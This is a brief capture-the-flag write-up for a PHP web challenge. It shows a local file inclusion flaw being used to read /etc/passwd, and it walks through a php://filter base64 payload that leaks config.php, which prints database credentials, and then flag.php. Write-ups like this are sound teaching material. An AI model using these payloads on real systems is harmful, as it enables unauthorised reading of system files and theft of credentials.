AUCHALL - [Web] - Intro

Challenge Description

The Introductions have to be really easy, no?

Solution

On opening the challenge we were given input

If we give /etc/passwd as input we get its output so it shows that it is using some sort of include() function to load file

Typically in php applications we use config.php file to store databases credentials

lets check config.php

we got no output which means we need to use php filter to convert the output into base64

php://filter/convert.base64-encode/resource=config.php

On decoding the base64 output we got database credentials

<?php
    $host = "127.0.0.1";
    $user = "the_user";
    $pass = "%as21k.amu2SAVS51";
    $db = "cy243l";
    /*
        In a recent scan, I found out that the db user and the machine user had exact same usernames and passwords. 
        Do ping me once you've changed it.
    */
?>
 

But wait we need flag. Where is the flag?

I tried checking for flag.php

php://filter/convert.base64-encode/resource=flag.php

Flag

Flag is dynamic

CY243L{b4s1c_lf1_f1lt3r_r3ad_eb8c9DD_eUcS_wIHW}

Writeups 2023 © RootxRAN.